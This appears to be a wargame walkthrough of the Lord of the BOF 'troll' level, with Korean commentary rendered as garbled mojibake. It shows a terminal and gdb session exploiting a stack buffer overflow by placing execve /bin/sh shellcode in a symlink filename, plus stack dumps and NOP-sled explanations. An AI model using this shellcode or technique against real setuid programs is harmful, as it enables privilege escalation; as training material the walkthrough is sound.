|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8610 [º¹»ç]
[orge@localhost orge]$ ls -al
total 52
drwx------ 2 orge orge 4096 Jul 3 07:00 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 orge orge 23 Jul 3 07:00 .bash_history
-rw-r--r-- 1 orge orge 24 Feb 27 2010 .bash_logout
-rw-r--r-- 1 orge orge 230 Feb 27 2010 .bash_profile
-rw-r--r-- 1 orge orge 124 Feb 27 2010 .bashrc
-rwxr-xr-x 1 orge orge 333 Feb 27 2010 .emacs
-rw-r--r-- 1 orge orge 3394 Feb 27 2010 .screenrc
-rwsr-sr-x 1 troll troll 12693 Mar 1 2010 troll
-rw-r--r-- 1 root root 772 Mar 29 2010 troll.c
[orge@localhost orge]$ clear
[orge@localhost orge]$ bash2
[orge@localhost orge]$ ls -al
total 52
drwx------ 2 orge orge 4096 Jul 3 07:00 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 orge orge 23 Jul 3 07:00 .bash_history
-rw-r--r-- 1 orge orge 24 Feb 27 2010 .bash_logout
-rw-r--r-- 1 orge orge 230 Feb 27 2010 .bash_profile
-rw-r--r-- 1 orge orge 124 Feb 27 2010 .bashrc
-rwxr-xr-x 1 orge orge 333 Feb 27 2010 .emacs
-rw-r--r-- 1 orge orge 3394 Feb 27 2010 .screenrc
-rwsr-sr-x 1 troll troll 12693 Mar 1 2010 troll
-rw-r--r-- 1 root root 772 Mar 29 2010 troll.c
[orge@localhost orge]$ cat troll.c
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
// here is changed
if(argc != 2){
printf("argc must be two!\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// one more!
memset(argv[1], 0, strlen(argv[1]));
}
Äڵ带 º¸¾ÆÇÏ´Ï argc ÀÎÀÚ°ªÀº 2°³°¡ µÇ¾î¾ßÇÏ°í
argv[1]Àº ¸¶Áö¸·¿¡ 0À¸·Î ÃʱâȵȴÙ.
...ÆÄÀÏ À̸§ ÀÚü¸¦ ÆäÀ̷εå·Î ¸¸µé¸é?
¤·¤» µÈ´Ù...
[orge@localhost orge]$ mkdir tmp
[orge@localhost orge]$ cp troll tmp
[orge@localhost orge]$ cd tmp
[orge@localhost tmp]$ ls
troll
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
?' to `troll': No such file or directory
[orge@localhost tmp]$ ls -al
total 24
drwxrwxr-x 2 orge orge 4096 Jul 7 04:09 .
drwx------ 3 orge orge 4096 Jul 7 04:09 ..
-rwsr-sr-x 1 orge orge 12693 Jul 7 04:09 troll
[orge@localhost tmp]$ ln -s ./troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
?' to `./troll': No such file or directory
[orge@localhost tmp]$ ls
troll
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
?' to `troll': No such file or directory
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
óÀ½¿£ 25¹ÙÀÌÆ® ½©Äڵ尡 ¿Ö ÆÄÀÏ À̸§¿¡ ³ÖÀ¸¸é ÀνÄÀÌ ¾È µÇ´ÂÁö
Çì¸Å´Ù°¡ ¿øÀÎÀ» ã¾Ò³Â´Ù.
±×°ÍÀº '\x2f'°ªÀº ½½·¡½¬(/)¸¦ ÀǹÌÇϴµ¥
ÀÌ°ÍÀº ¸®´ª½º ÆÄÀÏ À§Ä¡ÀÇ °æ·Î¸¦ ÀǹÌÇϱ⠶§¹®¿¡
\x2f°ªÀ» ³ÖÁö ¸»¾Æ¾ß µÇ´Â °ÍÀÌ´Ù.
¾Æ·¡´Â \x2f°¡ ¾ø´Â ½©ÄÚµå´Ù.
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
[orge@localhost tmp]$ ls
troll
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo??????
[orge@localhost tmp]$ gdb -q `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],2
0x804850a <main+10>: je 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048690
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x80497cc
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x80497cc
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x80497cc
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x80486a3
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
---Type <return> to continue, or q <return> to quit---
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: call 0x80483f0 <strlen>
0x80485be <main+190>: add %esp,4
0x80485c1 <main+193>: mov %eax,%eax
0x80485c3 <main+195>: cmp %eax,48
0x80485c6 <main+198>: jbe 0x80485e0 <main+224>
0x80485c8 <main+200>: push 0x80486c0
0x80485cd <main+205>: call 0x8048410 <printf>
0x80485d2 <main+210>: add %esp,4
0x80485d5 <main+213>: push 0
0x80485d7 <main+215>: call 0x8048420 <exit>
0x80485dc <main+220>: add %esp,4
0x80485df <main+223>: nop
0x80485e0 <main+224>: mov %eax,DWORD PTR [%ebp+12]
0x80485e3 <main+227>: add %eax,4
0x80485e6 <main+230>: mov %edx,DWORD PTR [%eax]
0x80485e8 <main+232>: push %edx
0x80485e9 <main+233>: lea %eax,[%ebp-40]
0x80485ec <main+236>: push %eax
0x80485ed <main+237>: call 0x8048440 <strcpy>
0x80485f2 <main+242>: add %esp,8
0x80485f5 <main+245>: lea %eax,[%ebp-40]
0x80485f8 <main+248>: push %eax
0x80485f9 <main+249>: push 0x80486d7
0x80485fe <main+254>: call 0x8048410 <printf>
0x8048603 <main+259>: add %esp,8
0x8048606 <main+262>: push 40
0x8048608 <main+264>: push 0
0x804860a <main+266>: lea %eax,[%ebp-40]
0x804860d <main+269>: push %eax
0x804860e <main+270>: call 0x8048430 <memset>
0x8048613 <main+275>: add %esp,12
0x8048616 <main+278>: mov %eax,DWORD PTR [%ebp+12]
0x8048619 <main+281>: add %eax,4
0x804861c <main+284>: mov %edx,DWORD PTR [%eax]
0x804861e <main+286>: push %edx
0x804861f <main+287>: call 0x80483f0 <strlen>
0x8048624 <main+292>: add %esp,4
0x8048627 <main+295>: mov %eax,%eax
0x8048629 <main+297>: push %eax
0x804862a <main+298>: push 0
0x804862c <main+300>: mov %eax,DWORD PTR [%ebp+12]
0x804862f <main+303>: add %eax,4
0x8048632 <main+306>: mov %edx,DWORD PTR [%eax]
0x8048634 <main+308>: push %edx
---Type <return> to continue, or q <return> to quit---
0x8048635 <main+309>: call 0x8048430 <memset>
0x804863a <main+314>: add %esp,12
0x804863d <main+317>: leave
0x804863e <main+318>: ret
0x804863f <main+319>: nop
End of assembler dump.
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
Starting program: /home/orge/tmp/?1?2ly???yyy2i00tii0cjo??
? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell¢¯¢¯¢¯¢¯
Program received signal SIGSEGV, Segmentation fault.
0xbfbfbfbf in ?? ()
(gdb) b *main+237
Breakpoint 1 at 0x80485ed
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/orge/tmp/?1?2ly???yyy2i00tii0cjo??
? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell
Breakpoint 1, 0x80485ed in main ()
(gdb) x/512x $esp
0xbffff8b4: 0xbffff8c0 0xbffffb35 0x00000017 0xbffff8e8
0xbffff8c4: 0x4000a970 0x400f855b 0x080496fc 0x4000ae60
0xbffff8d4: 0xbffff934 0xbffff8e8 0x080484eb 0x080496e8
0xbffff8e4: 0x080496fc 0xbffff908 0x400309cb 0x00000002
0xbffff8f4: 0xbffff934 0xbffff940 0x40013868 0x00000002
0xbffff904: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffff914: 0x00000002 0xbffff934 0x08048390 0x0804866c
0xbffff924: 0x4000ae60 0xbffff92c 0x40013e90 0x00000002
0xbffff934: 0xbffffa2d 0xbffffb35 0x00000000 0xbffffb66
0xbffff944: 0xbffffb88 0xbffffb92 0xbffffba0 0xbffffbbf
0xbffff954: 0xbffffbcc 0xbffffbe3 0xbffffbfd 0xbffffc1c
0xbffff964: 0xbffffc27 0xbffffc35 0xbffffc75 0xbffffc87
0xbffff974: 0xbffffc97 0xbffffcac 0xbffffcbc 0xbffffcc6
0xbffff984: 0xbffffce2 0xbffffcfa 0xbffffd05 0xbffffd16
0xbffff994: 0xbffffd29 0xbffffd31 0x00000000 0x00000003
0xbffff9a4: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffff9b4: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffff9c4: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffff9d4: 0x08048450 0x0000000b 0x000001fb 0x0000000c
0xbffff9e4: 0x000001fb 0x0000000d 0x000001fb 0x0000000e
0xbffff9f4: 0x000001fb 0x00000010 0x0febfbff 0x0000000f
0xbffffa04: 0xbffffa28 0x00000000 0x00000000 0x00000000
0xbffffa14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa24: 0x00000000 0x36383669 0x6f682f00 0x6f2f656d
0xbffffa34: 0x2f656772 0x2f706d74 0x90909090 0x90909090
0xbffffa44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa94: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaa4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb04: 0x315e11eb 0x8032b1c9 0x01ff0e6c 0x7501e980
0xbffffb14: 0xe805ebf6 0xffffffea 0x6951c132 0x69743030
0xbffffb24: 0x6a633069 0x51e48a6f 0x9ae28a54 0x81ce0cb1
0xbffffb34: 0x90909000 0x90909090 0x90909090 0x90909090
0xbffffb44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb54: 0x90909090 0x90909090 0x90909090 0xbfbfbf90
0xbffffb64: 0x000000bf 0x00000000 0x00000000 0x00000000
0xbffffb74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbd4: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffbe4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef4: 0x6d6f682f 0x726f2f65 0x742f6567 0x902f706d
0xbfffff04: 0x90909090 0x90909090 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbfffff14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff24: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff34: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff94: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffa4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffb4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffc4: 0x90909090 0xeb909090 0xc9315e11 0x6c8032b1
0xbfffffd4: 0x8001ff0e 0xf67501e9 0xeae805eb 0x32ffffff
0xbfffffe4: 0x306951c1 0x69697430 0x6f6a6330 0x5451e48a
0xbffffff4: 0xb19ae28a 0x0081ce0c 0x00000000 Cannot access memory at address 0xc0000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[orge@localhost tmp]$ cd ..
[orge@localhost orge]$ ls
tmp troll troll.c
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
>
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
>
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
> my-pass
>
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
my-pass
¢´yy¢¯
Segmentation fault
euid = 507
[?????????????]
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
¢´yy¢¯
Segmentation fault
µÎ¹ø° °íºñ°¡ ¿Ô´Ù...
ÇÊÀڴ Ȥ½Ã³ª ÆÄÀÏ À̸§(½©ÄÚµå) µÚ¿¡ \x90(nop)ÀÌ ¾ø¾î¼
±×·±°¡ À¯ÃßÇß°í ±× À¯Ãß°¡ ¸Â¾Æ ¶³¾îÁ³´Ù.
NOP Sled¶õ ¹«¾ùÀϱî?
"NOP ¸í·É¾î(¾Æ¹«°Íµµ ¾È ÇÏ´Â ¸í·É¾î)"¸¦ ¹Ì²ô·³Æ²Ã³·³ Âß ±ò¾ÆµÎ°í,
±× À§¿¡ shellcode¸¦ ¹èÄ¡ÇØ, return address°¡ Á¤È®È÷ ¸ÂÁö ¾Ê¾Æµµ
shellcode±îÁö ¹Ì²ô·¯Áöµí µµ´ÞÇÏ°Ô ¸¸µå´Â ±â¹ý"
±¸Á¶Àû °³³äÀº...
¹öÆÛ ¿À¹öÇ÷οì exploitÀº ´ëü·Î ÀÌ·± ±¸Á¶¸¦ °¡Áö°Ô µÈ´Ù.
[ NOP SLED ][ Shellcode ][ Padding ][ Return Address ]
±Ùµ¥ ½ÇÁ¦·Î´Â ÀÌ·¸°Ô ¸Þ¸ð¸®¿¡ ½×ÀδÙ.
|--------------------------|
| NOP sled (ex. \x90) |
|--------------------------|
| Shellcode |
|--------------------------|
| Saved EBP |
|--------------------------|
| Return Address (EIP) |
|--------------------------|
nopÀÇ ¸ñÀûÀº...
EIP(Return Address) ¸¦ Á¤È®È÷ shellcode À§Ä¡¿¡ ¸ÂÃß´Â °Ç ¾î·Æ´Ù.
±×·¡¼ ±× "±Ùó" ¾îµò°¡¿¡¸¸ Á¡ÇÁÇصµ ¼º°ø½ÃÅ°·Á°í,
shellcode ¾Õ¿¡ NOP¸¦ ÀÜ¶à ±ò¾ÆµÎ´Â °ÍÀÌ´Ù.
EIP°¡ NOP ¾È ¾îµò°¡·Î ¶³¾îÁö¸é
NOP°¡ ¿¬´Þ¾Æ ½ÇÇàµÇ¸é¼ °á±¹ shellcode¿¡ µµ´ÞÇÏ°Ô µÈ´Ù.
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*30'`
ln: ?1?2ly???yyy2i00tii0cjo??
?: File name too long
[orge@localhost orge]$ cd tmp
[orge@localhost tmp]$ ls
troll
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo??????
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
[orge@localhost tmp]$ gdb -q ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
(gdb) set disassembly inte
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],2
0x804850a <main+10>: je 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048690
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x80497cc
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x80497cc
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x80497cc
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x80486a3
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
---Type <return> to continue, or q <return> to quit---
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: call 0x80483f0 <strlen>
0x80485be <main+190>: add %esp,4
0x80485c1 <main+193>: mov %eax,%eax
0x80485c3 <main+195>: cmp %eax,48
0x80485c6 <main+198>: jbe 0x80485e0 <main+224>
